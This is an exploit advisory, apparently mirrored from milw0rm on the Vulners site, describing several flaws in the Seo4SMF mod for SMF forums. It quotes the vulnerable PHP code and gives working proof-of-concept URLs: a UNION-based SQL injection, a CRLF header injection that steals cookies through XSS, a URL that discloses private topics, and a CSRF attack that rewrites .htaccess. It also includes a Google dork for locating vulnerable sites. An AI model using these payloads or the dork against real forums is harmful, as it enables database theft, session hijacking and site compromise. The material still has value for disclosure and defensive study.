Vulners
Lucene search
Seo4SMF for SMF forums - Multiple Vulnerabilities
[1] Inyection SQL
Linea 50 al 63
$query = db_query("
SELECT m.ID_TOPIC, m.subject ,b.ID_BOARD, b.name
FROM {$db_prefix}messages AS m, {$db_prefix}boards AS b
WHERE m.ID_TOPIC = *$topic*
AND m.ID_BOARD = b.ID_BOARD
IMIT 1", __FILE__, __LINE__);
------------------------------------------------------------------------
Linea 105 al 108
$query = db_query("
SELECT name FROM {$db_prefix}boards AS b
WHERE ID_BOARD = *$board*
LIMIT 1", __FILE__, __LINE__);
------------------------------------------------------------------------
Linea 125
$request = db_query("SELECT memberName FROM {$db_prefix}members where
ID_MEMBER=".*$user*." limit 1", __FILE__, __LINE__);
------------------------------------------------------------------------
Linea 143
$request = db_query("SELECT subject FROM {$db_prefix}tp_articles where
id=".*$tpage*." limit 1", __FILE__, __LINE__);
Where:
Linea 7 al 13
$topic = $_GET['t'];
$board = $_GET['b'];
$other = $_GET['o'];
$user = $_GET['u'];
$tpage = $_GET['p'];
$action = $_GET['a'];
$param = $_GET['param'];
Now execute the proof of concept:
http://localhost/smf/seo4smf-redirect.php?t=-1 union select 1,2,3…(numero de columnas)…,concat(username(),database()) –
GoogleDorks: http://www.google.cl/search?hl=es&q=allinurl%3Aseo4smf-redirect.php&btnG=Buscar+con+Google&meta=
[2] Inyection of headers, Cross site Scripting and Path disclosure:
Source:
if(!empty <http://www.php.net/empty>($url)){
header <http://www.php.net/header>('HTTP/1.1 301 Moved Permanently');
header <http://www.php.net/header>('Location: '.$url);
exit <http://www.php.net/exit>;
}
The proof of concept:
http://localhost/seo4smf-redirect.php?a=x%0DLocation:%20javascript:alert(document.cookie);
Real test: http://www.jccharry.com/archivos_publicos/xss_seo4smf.png
Or print the error with path disclosure.
[3] Disclosure in topics:
http://localhost/seo4smf-redirect.php?t=[number 1 to total topics].new/topicseen
This return the privates forumnames and topicnames.
[4] Cross site request forgery and inyection of arbitrary code
Source:
if (isset($_POST['htaccess']))
{
$htaccess = stripslashes($_POST['htaccess']);
//str_replace("\\\\","\\",$htaccess);
file_put_contents($boarddir."/.htaccess", $htaccess);
}
csrf -> .htaccess rewrited -> pwned!
and xml files.
exploits and more in
http://foro.elhacker.net/bugs_y_exploits/falla_en_el_mod_seo4smf_para_smf-t241029.0.html
and
http://www.jccharry.com/blog/2009/01/09/whk_fallas-criticas-en-seo4smf-para-foros-smf-simplemachines-forum.html
-={[unica_inc algún dia estaremos juntos]}=-
# milw0rm.com [2009-01-11]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Jan 2009 00:00Current
7.4High risk
Vulners AI Score7.4